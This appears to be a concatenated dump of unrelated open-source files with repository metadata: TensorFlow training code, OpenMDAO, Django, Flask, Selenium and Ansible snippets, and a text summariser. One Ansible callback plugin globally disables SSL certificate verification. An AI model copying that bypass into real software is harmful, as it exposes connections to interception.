print("Auc on Valid Set: {}".format(auc))
f1_score = metrics.f1_score(y_true, y_pred)
print("F1 score: {}".format(f1_score))
average_precision = metrics.average_precision_score(y_true, y_pred)
print("average precsion on valid: {}".format(average_precision))
FP = cm.sum(axis=0) - np.diag(cm)
FN = cm.sum(axis=1) - np.diag(cm)
TP = np.diag(cm)
TN = cm.sum() - (FP + FN + TP)
return
tf.reset_default_graph()
with tf.Graph().as_default(), tf.device('/cpu:0'):
loader = data_loader.DataReaderISIC2017(_BATCH_SIZE, _EPOCHS, gpu_nums)
train_x, train_y, train_l = loader.getTrainDataForClassificationMelanoma()
num_iterations = loader.iterations
print("Iterations {}".format(num_iterations))
total_count = loader.total_train_count
step_local = int(math.ceil(_EPOCHS * total_count / _BATCH_SIZE))
global_step = tf.get_variable('global_step', [], initializer=tf.constant_initializer(0), trainable=False)
optimizer = tf.train.GradientDescentOptimizer(learning_rate)
images = tf.placeholder(tf.float32, shape=[None, 224*224*3])
labels = tf.placeholder(tf.float32, shape=[None, 2])
batch_size_gpu = tf.placeholder(tf.int32)
tower_grads = []
losses = []
y_pred_classes = []
for i in range(gpu_nums):
with tf.device('/gpu:{}'.format(i)):
with tf.name_scope("tower_{}".format(i)) as scope:
per_gpu_count = batch_size_gpu
start = i * per_gpu_count
end = start + per_gpu_count
output, y_pred_class = core_model(images[start:end,:],labels[start:end,:], _NUM_CLASSES)
loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=output, labels=labels[start:end,:]))
#losses = tf.get_collection('losses', scope)
# Calculate the total loss for the current tower.
#loss = tf.add_n(losses, name='total_loss')
losses.append(loss)
# Reuse variables for the next tower.
tf.get_variable_scope().reuse_variables()
grads = optimizer.compute_gradients(loss)
# Keep track of the gradients across all towers.
tower_grads.append(grads)
y_pred_classes.append(y_pred_class)
# We must calculate the mean of each gradient. Note that this is the
# synchronization point across all towers.
grads = average_gradients(tower_grads)
apply_gradient_op = optimizer.apply_gradients(grads, global_step=global_step)
losses_mean = tf.reduce_mean(losses)
y_pred_classes_op=tf.reshape(tf.stack(y_pred_classes, axis=0),[-1])
correct_prediction = tf.equal(y_pred_classes_op, tf.argmax(labels, axis=1))
batch_accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
# variable_averages = tf.train.ExponentialMovingAverage(
# MOVING_AVERAGE_DECAY, global_step)
# variables_averages_op = variable_averages.apply(tf.trainable_variables())
# Group all updates to into a single train op.
# train_op = tf.group(apply_gradient_op, variables_averages_op)
train_op = apply_gradient_op
# Start running operations on the Graph. allow_soft_placement must be set to
# True to build towers on GPU, as some of the ops do not have GPU
# implementations.
start = time.time()
# saver = tf.train.Saver(tf.all_variables())
saver = tf.train.Saver(tf.all_variables())
init = tf.initialize_all_variables()
saver = tf.train.Saver()
sess = tf.Session(config=tf.ConfigProto(
allow_soft_placement=True,
log_device_placement=True))
train_writer = tf.summary.FileWriter(_SAVE_PATH, sess.graph)
try:
print("Trying to restore last checkpoint ...")
last_chk_path = tf.train.latest_checkpoint(checkpoint_dir=_SAVE_PATH)
saver.restore(sess, save_path=last_chk_path)
print("Restored checkpoint from:", last_chk_path)
except:
print("Failed to restore checkpoint. Initializing variables instead.")
sess.run(tf.global_variables_initializer())
step_global = sess.run(global_step)
step_local = int(math.ceil(_EPOCHS * total_count / _BATCH_SIZE))
epoch_done = int(math.ceil(step_global / (_BATCH_SIZE)))
print("global:{}, local: {}, epochs done {}".format(step_global, step_local, epoch_done))
if step_local < step_global:
print("Training steps completed: global: {}, local: {}".format(step_global, step_local))
exit()
#predict_valid()
for epoch in range(epoch_done,_EPOCHS ):
#print(total_count)
shuffle_order=[i for i in range(total_count)]
random.shuffle(shuffle_order)
#print(shuffle_order)
print("iterations {}".format(num_iterations))
train_x = train_x[shuffle_order].reshape(total_count, -1)
train_y = train_y[shuffle_order].reshape(total_count, -1)
# this mehod is suitable when we load all training data in memory at once.
lastEpoch=0
for i in range(num_iterations):
#print(num_iterations+_BATCH_SIZE)
#print(loader.total_train_count)
startIndex = _BATCH_SIZE * i * gpu_nums
endIndex = min(startIndex + _BATCH_SIZE * gpu_nums, total_count )
#print("epoch:{}, iteration:{}, start:{}, end:{} ".format(epoch, i, startIndex, endIndex))
batch_xs = train_x[startIndex:endIndex,:]
batch_ys = train_y[startIndex:endIndex,:]
#print("feed data shape {} , {}".format(batch_xs.shape, batch_ys.shape))
#print(batch_ys)
start_time = time.time()
_,step_global_out, loss_out, batch_accuracy_out = sess.run([train_op,global_step, losses_mean, batch_accuracy], feed_dict={batch_size_gpu:_BATCH_SIZE,images: batch_xs, labels: batch_ys})
steps = + i
if (i % 5 == 0) or (i == _EPOCHS * total_count - 1):
#print("train epoch: {}, iteration: {}, Accuracy: {}, loss: {}".format(epoch, i, batch_accuracy_out, loss_out ))
duration = time.time() - start_time
#msg = "Epoch: {0:}, Global Step: {1:>6}, accuracy: {2:>6.1%}, loss = {3:.2f} ({4:.1f} examples/sec, {5:.2f} sec/batch)"
#print(msg.format(epoch,step_global, batch_acc, _loss, _BATCH_SIZE / duration, duration))
if i!=0 and epoch!=lastEpoch:
lastEpoch=epoch
valid_x, valid_y, valid_l = loader.getValidationDataForClassificationMelanoma()
total_count_valid = len(valid_x)
startIndex = 0 # for validation there is just
endIndex = min(startIndex + _BATCH_SIZE_VALID * gpu_nums, total_count_valid)
# all variable should have a idffierent name.
step_global_out, batch_accuracy_valid_out = sess.run([global_step, batch_accuracy],
feed_dict={batch_size_gpu:_BATCH_SIZE_VALID,images: valid_x, labels: valid_y})
print("valid epoch: {}, iteration: {}, Accuracy: {}".format(epoch, i, batch_accuracy_out ))
# batch_xs = valid_x[startIndex:endIndex, :]
# batch_ys = valid_y[startIndex:endIndex, :]
# print("feed data shape for validation {} , {}".format(batch_xs.shape, batch_ys.shape))
# # print(batch_ys)
#
# start_time = time.time()
# step_global_out, loss_out, y_pred_out = sess.run([global_step, losses, y_pred_classes],
# feed_dict={images: batch_xs, labels: batch_ys})
# y_pred = np.asarray(y_pred_out).reshape(-1)
# correct = (np.argmax(valid_y, axis=1) == y_pred)
# acc = correct.mean() * 100
# correct_numbers = correct.sum()
# print("Accuracy on Valid-Set: {0:.2f}% ({1} / {2})".format(acc, correct_numbers, len(valid_x)))
#print("Saving checkpoint............")
#saver.save(sess, save_path=_SAVE_PATH, global_step=global_step)
#predict_valid()
# if (step_global % 100 == 0) or (i == _EPOCHS * total_count - 1):
# data_merged, global_1 = sess.run([merged, global_step], feed_dict={x: batch_xs, y: batch_ys})
# #acc = predict_test()
#
# # summary = tf.Summary(value=[
# # tf.Summary.Value(tag="Accuracy/test", simple_value=acc),
# # ])
# # train_writer.add_summary(data_merged, global_1)
# # train_writer.add_summary(summary, global_1)
#
| [
"milton.2002@yahoo.com"
] | milton.2002@yahoo.com |
f9783dda5c1663e07679d767cb045a425f767f67 | 4d5adf020161db482e24ebe353c70567bb14a1a1 | /propulsion/thrust_force.py | d428164ff1452e54121c2c0d3d3b5d6b1f3b8a11 | [] | no_license | leamichel97/prop-solid | 1403b9abd6a73fda6906dfe5de5543e59d2508ad | c81bf700ee07b304d550c47a5afa85e476ecb38d | refs/heads/master | 2022-12-18T12:50:54.042165 | 2020-09-03T10:16:46 | 2020-09-03T10:16:46 | 253,484,751 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,781 | py | # -*- coding: utf-8 -*-
"""
thrust_force.py generated by WhatsOpt 1.10.1
"""
import numpy as np
from propulsion.thrust_force_base import ThrustForceBase
class ThrustForce(ThrustForceBase):
""" An OpenMDAO component to encapsulate ThrustForce discipline """
def compute(self, inputs, outputs):
""" ThrustForce computation """
if self._impl:
# Docking mechanism: use implementation if referenced in .whatsopt_dock.yml file
self._impl.compute(inputs, outputs)
else:
Ae = inputs['Ae']
Pa = inputs['Pa']
Pe = inputs['Pe']
prop_m = inputs['prop_m']
Ve = inputs['Ve']
zeta = inputs['zeta']
F_T = zeta * ((prop_m * Ve) + (Ae * (Pe - Pa)))
outputs['F_T'] = F_T
return outputs
# Reminder: inputs of compute()
#
# inputs['Ae'] -> shape: (1,), type: Float
# inputs['Pa'] -> shape: (1,), type: Float
# inputs['Pe'] -> shape: (1,), type: Float
# inputs['prop_m'] -> shape: (1,), type: Float
# inputs['Ve'] -> shape: (1,), type: Float
# inputs['zeta'] -> shape: (1,), type: Float
# To declare partial derivatives computation ...
#
# def setup(self):
# super(ThrustForce, self).setup()
# self.declare_partials('*', '*')
#
# def compute_partials(self, inputs, partials):
# """ Jacobian for ThrustForce """
#
# partials['F_T', 'Ae'] = np.zeros((1, 1))
# partials['F_T', 'Pa'] = np.zeros((1, 1))
# partials['F_T', 'Pe'] = np.zeros((1, 1))
# partials['F_T', 'prop_m'] = np.zeros((1, 1))
# partials['F_T', 'Ve'] = np.zeros((1, 1))
# partials['F_T', 'zeta'] = np.zeros((1, 1))
| [
"leamichel1497@gmail.com"
] | leamichel1497@gmail.com |
23fbea60c2bea452a414dcf5f255cd4eabdab38a | 437e905d8c214dc25c559b1dc03eaf9f0c85326f | /is28/vyacheslavleva28/lab6/function.py | 1522faa137dc1fcb8f84d4cc4b96a551fd47870d | [] | no_license | AnatolyDomrachev/karantin | 542ca22c275e39ef3491b1c0d9838e922423b5a9 | 0d9f60207e80305eb713fd43774e911fdbb9fbad | refs/heads/master | 2021-03-29T03:42:43.954727 | 2020-05-27T13:24:36 | 2020-05-27T13:24:36 | 247,916,390 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 364 | py | def vvod():
a = []
for i in range(10):
x = float(input())
a.append(x)
return a
def rachet(a):
res = True
for i in range(0,len(a)-1):
if a[i]> a[i+1]:
res = False
return res
def vyvod(data):
print(result)
data = vvod()
print(data)
result = rachet(data)
print(result)
vyvod(result)
print(vyvod) | [
"you@example.com"
] | you@example.com |
6b7bcedc92889fdfac3fae2f3865e4e431ac3a06 | c381e484986b08022be508f285cc142017680319 | /mycats.py | 6c7f2ff8b22648624d73da15fc6a121f54af7a82 | [] | no_license | kasalak/automate-the-boring-stuff | 1060d4919f23b25c6653fd55ef09c436bb7ea2bd | e205bac5cd629f52af11e5ace6475e764612498e | refs/heads/master | 2021-01-21T13:53:14.332726 | 2016-05-10T17:24:04 | 2016-05-10T17:24:04 | 51,721,180 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 194 | py | mypets = ['Zophie', 'Pooka', 'Fat-tail']
print('Enter a pet name: ')
name = input()
if name not in mypets:
print('I do not have a pet named ' + name)
else:
print(name + ' is my pet.x`')
| [
"karthik.kasala@gmail.com"
] | karthik.kasala@gmail.com |
e7a3ca9fa15a77897aa6fde5e7b69ee9bb2f853d | ac350894488b34318c11a65d35a0f8fdf69b7d50 | /products/migrations/0001_initial.py | 545343aa9abd1f1393c114e71c6c8e1aed73463f | [] | no_license | phrac/onemgin | 508f052304ddbc03f45e994ebe33769ae30d9336 | 7a029dbca1bd2725ceabc0741c7cfb47290aadb7 | refs/heads/master | 2021-01-16T19:31:10.929508 | 2015-09-08T23:53:43 | 2015-09-08T23:53:43 | 12,391,387 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,083 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Barcode',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('image', models.FileField(null=True, upload_to=b'barcodes/ean13/')),
],
),
migrations.CreateModel(
name='BarcodeType',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=32)),
],
),
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('onemg', models.CharField(unique=True, max_length=13)),
('ean', models.CharField(unique=True, max_length=13)),
('upc', models.CharField(unique=True, max_length=12)),
('jan', models.CharField(max_length=13, null=True)),
('gtin', models.CharField(max_length=14, null=True)),
('nsn', models.CharField(max_length=14, null=True)),
('isbn10', models.CharField(max_length=10, null=True)),
('isbn13', models.CharField(max_length=13, null=True)),
('asin', models.CharField(max_length=10, null=True)),
('brand', models.CharField(max_length=128, null=True)),
('manufacturer', models.CharField(max_length=128, null=True)),
('mpn', models.CharField(max_length=64, null=True)),
('part_number', models.CharField(max_length=64, null=True)),
('sku', models.CharField(max_length=64, null=True)),
('model_number', models.CharField(max_length=64, null=True)),
('length', models.FloatField(null=True)),
('width', models.FloatField(null=True)),
('height', models.FloatField(null=True)),
('weight', models.FloatField(null=True)),
('description', models.CharField(max_length=512, null=True)),
('image_url', models.CharField(max_length=512, null=True)),
('amazon_url', models.URLField(null=True)),
('created', models.DateTimeField(auto_now_add=True, null=True)),
],
),
migrations.AddField(
model_name='barcode',
name='product',
field=models.ForeignKey(to='products.Product'),
),
migrations.AddField(
model_name='barcode',
name='type',
field=models.ForeignKey(to='products.BarcodeType'),
),
migrations.AlterUniqueTogether(
name='barcode',
unique_together=set([('product', 'type')]),
),
]
| [
"derek@disflux.com"
] | derek@disflux.com |
5d8cfdb679b337f26330b1c109a88a1680180caf | d569476dd95496339c34b231621ff1f5dfd7fe49 | /PyTest/SteamSender/tests/test_send_cards.py | 996577a1586476bfeec33e7f74f1ba41cfd2b17e | [] | no_license | monteua/Tests | 10f21f9bae027ce1763c73e2ea7edaf436140eae | 553e5f644466683046ea180422727ccb37967b98 | refs/heads/master | 2021-01-23T10:28:49.654273 | 2018-05-09T09:11:30 | 2018-05-09T09:11:30 | 93,061,159 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 494 | py | from PageObject.SteamActions import SteamHome
from accounts import accounts
accounts_list = accounts()
def test_send_trade(driver):
for login in accounts_list:
if login == 'monte_ua13':
password = ""
else:
password = ""
SteamHome(driver).open_browser()
SteamHome(driver).enter_credentials(login, password)
SteamHome(driver).pass_steam_guard()
SteamHome(driver).open_trade_url()
SteamHome(driver).log_off()
| [
"arximed.monte@gmail.com"
] | arximed.monte@gmail.com |
72dc217f031f0e0fe7fb784bc8ac8024f1dc926e | 340d83cbefd7a9c88b18ff25f6f5dd90e1131ad6 | /setup.py | 54baf8251ca1cb7f55ed33f6ffb2465951c6bfb5 | [
"MIT"
] | permissive | PTC-CMC/calculator | 50304326acfd501a6503d59ad81cc3502b21d934 | e89ab40336ebe57e3a2c272281f9160a212e7055 | refs/heads/master | 2022-10-03T19:21:48.502774 | 2020-06-04T19:54:30 | 2020-06-04T19:54:30 | 269,222,035 | 0 | 5 | MIT | 2020-06-04T19:54:31 | 2020-06-04T00:17:00 | Python | UTF-8 | Python | false | false | 232 | py | from setuptools import setup
# Originally an idea and implementation by Matt Thompson
# https://github.com/mattwthompson/calculator
setup(
name='Calculator',
version='0.0',
packages=['calculator',],
license='MIT',
)
| [
"justin.b.gilmer@vanderbilt.edu"
] | justin.b.gilmer@vanderbilt.edu |
de7e14bb4a48b4fa23f12d9b6ee34dd226ad6ecb | 843af55f35c54d85bf6006ccf16c79d9a5451285 | /25 - more_lists.py | 8af52312523c5eb4245f871af28a73e7de55b267 | [] | no_license | estebantoso/curso_python_udemy | 2a5989351921d54394b61df1e8089c58088a01cc | 0f4deba3b0efbc59159aaeb49ffd95c6724c2dd2 | refs/heads/master | 2020-05-22T19:00:36.599701 | 2019-05-23T14:49:31 | 2019-05-23T14:49:31 | 186,485,180 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 87 | py | friends = ["A", "B", "C"]
print(friends[0])
print(friends[-1])
print("A" in friends) | [
"estebantoso@gmail.com"
] | estebantoso@gmail.com |
491dc44ae36dbbbd2a8115d6c4c80ac79186d685 | 5ec09f479c7a680f77d2b8e5da675e24daf82da7 | /callback_plugins/fix_ssl.py | 330fc989837e7a72fe813929f80bb61a65438884 | [] | no_license | tbuchi888/vagrant-yaml-ansible | 1f2d3bcb5d35d3d1e72c1cda2730bc761d33e812 | 0837e62a3a835d94cb9200160548034f26e3a991 | refs/heads/master | 2021-01-10T02:52:51.389484 | 2016-03-19T16:05:58 | 2016-03-19T16:05:58 | 54,269,456 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 215 | py | import ssl
if hasattr(ssl, '_create_default_https_context') and hasattr(ssl, '_create_unverified_context'):
ssl._create_default_https_context = ssl._create_unverified_context
class CallbackModule(object):
pass
| [
"tbuchi888@users.noreplay.github.com"
] | tbuchi888@users.noreplay.github.com |
ce65095ee46c58e871cd6b80c4cfe769ace6e7a1 | f5f7f8d12956e4bff6e1c5f6fab10b006690f195 | /luffy/settings.py | fe7c34ae1af2839496be8ef590c0c49e0a16121b | [] | no_license | chenrun666/luffy | 1fbee911d1d7f86e5c7b1ed7f47e84f6f1ee9846 | 59f6229e16978ab9c40ef948807c717c2cddaea9 | refs/heads/master | 2020-04-07T16:09:20.306754 | 2018-11-21T08:45:29 | 2018-11-21T08:45:29 | 158,517,404 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,582 | py | """
Django settings for luffy project.
Generated by 'django-admin startproject' using Django 1.11.15.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'h*zthsj)s$^_5kxkdbk+^gy2ih+vh6kpw#wu$uy^0bce((+k)9'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'course.apps.CourseConfig',
'rest_framework',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'course.mymiddleware.accessmiddleware.CrossDomainMiddleWare',
]
ROOT_URLCONF = 'luffy.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'luffy.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": "redis://127.0.0.1:6379",
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.DefaultClient",
"CONNECTION_POOL_KWARGS": {"max_connections": 100}
# "PASSWORD": "密码",
}
}
}
| [
"17610780919@163.com"
] | 17610780919@163.com |
6d99627b90704b1feee0b966f1164aaffdfc291c | ad0e6decddcbd6bafce08075c04fcc5d1824513e | /abs_try.py | 50b59bf80a1f14f6df5525812e0a4ffb13972103 | [] | no_license | sihanj/nlp_test2 | dc95cf087dfd9a799e83a7fb4d8b543e51153dcc | 4cd10b90ebe19724fa17f254be62574bb069987a | refs/heads/master | 2020-03-25T20:54:16.004753 | 2019-04-22T04:46:05 | 2019-04-22T04:46:05 | 144,150,640 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,840 | py | import re
import jieba
import networkx as nx
from sklearn import feature_extraction
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfVectorizer
#分句
def cut_sentence(sentence):
if not isinstance(sentence,str):
sentence=sentence.decode('utf-8')
delimiters=frozenset(u'。?!')
buf=[]
for ch in sentence:
buf.append(ch)
if delimiters.__contains__(ch):
yield ''.join(buf)
buf=[]
if buf:
yield ''.join(buf)
#停用词
def load_stopwords(path='stopwords.txt'):
with open(path,encoding='utf-8') as f:
stopwords=filter(lambda x:x,map(lambda x:x.strip(),f.readlines()))
#stopwords.extend([' ','\t','\n'])
return frozenset(stopwords)
#分词
def cut_words(sentence):
stopwords=load_stopwords()
return filter(lambda x: not stopwords.__contains__(x),jieba.cut(sentence))
#摘要
def get_abstract(content,size=3):
docs=list(cut_sentence(content))
tfidf_model=TfidfVectorizer(tokenizer=jieba.cut,stop_words=load_stopwords())
tfidf_matrix=tfidf_model.fit_transform(docs)
normalized_matrix=TfidfTransformer().fit_transform(tfidf_matrix)
similarity=nx.from_scipy_sparse_matrix(normalized_matrix*normalized_matrix.T)
scores=nx.pagerank(similarity)
tops=sorted(scores.items(),key=lambda x:x[1],reverse=True)
size=min(size,len(docs))
indices=list(map(lambda x:x[0],tops))[:size] #list
return map(lambda idx:docs[idx],indices)
a=input('请输入文档:')
a= re.sub(u'[ , ]',u'',a)
print('摘要为:')
abs=[]
for i in get_abstract(a):
abs.append(i)
print(str(abs).replace("'",'').replace(",",'').replace(" ","").replace("[","").replace("]",""))
input('任意键退出程序') | [
"noreply@github.com"
] | sihanj.noreply@github.com |
8e1342c5a5fb325ae9a8dd315f48ea850dd6e3fb | 9f9fa056d9f9a9a1671fd76009aaabeef9ce58d6 | /output/wwinp_plot.py | a64392e3395afc046326b7dcf81e4ff7429f873d | [
"LicenseRef-scancode-warranty-disclaimer"
] | no_license | py1sl/pyne_based_tools | 8a6f9172125bcf24698d2c3d0a3ef5b493eaea1c | 92bd8865b9e9de78d24a2e635e0f2e826bad5e61 | refs/heads/master | 2021-01-19T03:13:11.600946 | 2017-09-12T09:49:35 | 2017-09-12T09:49:35 | 55,595,092 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 503 | py | from pyne import mcnp
from itaps import iBase, iMesh
import h5py
import sys
from subprocess import call
def convert_wwinp(argv):
"""simple conversion of wwinp to vtk via h5m """
in_path = argv[0]
out_path = argv[1]
wwinp_mesh = mcnp.Wwinp()
wwinp_mesh.read_wwinp(in_path)
wwinp_mesh.mesh.save(out_path+".h5m")
call(["expand_tags.py", out_path+".h5m" , "-o", out_path+".vtk"])
call(["rm", out_path+".h5m"])
if __name__ == "__main__":
convert_wwinp(sys.argv[1:])
| [
"steven.lilley@stfc.ac.uk"
] | steven.lilley@stfc.ac.uk |
06aae58ab947c90ed7bc942a02ffa420afd0287b | 7bededcada9271d92f34da6dae7088f3faf61c02 | /pypureclient/flashblade/FB_2_6/models/network_interface_trace_get_response.py | 711d740178ee303c6379e1c1ec389c67bd15cca7 | [
"BSD-2-Clause"
] | permissive | PureStorage-OpenConnect/py-pure-client | a5348c6a153f8c809d6e3cf734d95d6946c5f659 | 7e3c3ec1d639fb004627e94d3d63a6fdc141ae1e | refs/heads/master | 2023-09-04T10:59:03.009972 | 2023-08-25T07:40:41 | 2023-08-25T07:40:41 | 160,391,444 | 18 | 29 | BSD-2-Clause | 2023-09-08T09:08:30 | 2018-12-04T17:02:51 | Python | UTF-8 | Python | false | false | 4,335 | py | # coding: utf-8
"""
FlashBlade REST API
A lightweight client for FlashBlade REST API 2.6, developed by Pure Storage, Inc. (http://www.purestorage.com/).
OpenAPI spec version: 2.6
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flashblade.FB_2_6 import models
class NetworkInterfaceTraceGetResponse(object):
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'continuation_token': 'str',
'total_item_count': 'int',
'items': 'list[NetworkInterfaceTrace]'
}
attribute_map = {
'continuation_token': 'continuation_token',
'total_item_count': 'total_item_count',
'items': 'items'
}
required_args = {
}
def __init__(
self,
continuation_token=None, # type: str
total_item_count=None, # type: int
items=None, # type: List[models.NetworkInterfaceTrace]
):
"""
Keyword args:
continuation_token (str): Continuation token that can be provided in the `continuation_token` query param to get the next page of data. If you use the `continuation_token` to page through data you are guaranteed to get all items exactly once regardless of how items are modified. If an item is added or deleted during the pagination then it may or may not be returned. The `continuation_token` is generated if the `limit` is less than the remaining number of items, and the default sort is used (no sort is specified).
total_item_count (int): Total number of items after applying `filter` params.
items (list[NetworkInterfaceTrace]): A list of network trace run result.
"""
if continuation_token is not None:
self.continuation_token = continuation_token
if total_item_count is not None:
self.total_item_count = total_item_count
if items is not None:
self.items = items
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `NetworkInterfaceTraceGetResponse`".format(key))
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
return None
else:
return value
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(NetworkInterfaceTraceGetResponse, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, NetworkInterfaceTraceGetResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"tlewis@purestorage.com"
] | tlewis@purestorage.com |
e4a7172c8a987feebc4e08c448cc4dc8bfc40b73 | 913334a96677deb9a199d4a7244a4fa56e989fa7 | /5flask_demo/modles.py | b90abf5bc7e9a32e86e2ee62ce28a818258daaff | [] | no_license | KangZhengweiGH/flask_demos | 7bd4b64f252055017f512f6fb348c885c377f241 | 1a0c621c8f0bd44fd583b026ef575990b5dda706 | refs/heads/master | 2020-05-16T07:28:24.055118 | 2019-05-08T01:00:30 | 2019-05-08T01:00:30 | 182,879,507 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,154 | py | # coding=utf-8
from extend import db
class User(db.Model):
__tablename__ = 'user'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
name = db.Column(db.String(12), nullable=True, unique=True)
telnumber = db.Column(db.Integer, nullable=False, unique=True)
password = db.Column(db.String(100), nullable=False)
vip = db.Column(db.BOOLEAN, default=False)
isdelate = db.Column(db.BOOLEAN, default=False)
logintime = db.Column(db.DateTime, nullable=True)
category_book = db.Table('category_book',
db.Column('category_id', db.Integer, db.ForeignKey('category.id'), primary_key=True),
db.Column('book_id', db.Integer, db.ForeignKey('book.id'), primary_key=True))
category_chapter = db.Table('category_chapter',
db.Column('category_id', db.Integer, db.ForeignKey('category.id'), primary_key=True),
db.Column('chapter_id', db.Integer, db.ForeignKey('chapter.id'), primary_key=True))
class Category(db.Model):
__tablename__ = 'category'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
name = db.Column(db.String(50), nullable=False)
fatherc_id = db.Column(db.Integer, db.ForeignKey('fatherc.id'))
fatherc = db.relationship('Fatherc', backref=db.backref('categorys'))
class Fatherc(db.Model):
__tablename__ = 'fatherc'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
name = db.Column(db.String(50), nullable=False)
class Book(db.Model):
__tablename__ = 'book'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
name = db.Column(db.String(50), nullable=False)
need_vip = db.Column(db.BOOLEAN, default=False)
introduce = db.Column(db.Text, nullable=True)
book_image = db.Column(db.String(50), nullable=True)
isdelate = db.Column(db.BOOLEAN, default=False)
# 这个外键就不需要了,呀好坑
# category_id = db.Column(db.Integer, db.ForeignKey('category.id'))
category = db.relationship('Category', secondary=category_book, backref=db.backref('books'))
class Chapter(db.Model):
__tablename__ = 'chapter'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
name = db.Column(db.String(50), nullable=False)
need_vip = db.Column(db.BOOLEAN, default=False)
book_id = db.Column(db.Integer, db.ForeignKey('book.id'))
book = db.relationship('Book', backref=db.backref('chapters'))
category = db.relationship('Category', secondary=category_chapter, backref=db.backref('chapters'))
# class Artical(db.Model):
# __tablename__ = 'articals'
# id = db.Column(db.Integer, primary_key=True, autoincrement=True)
# name = db.Column(db.String(50), nullable=False)
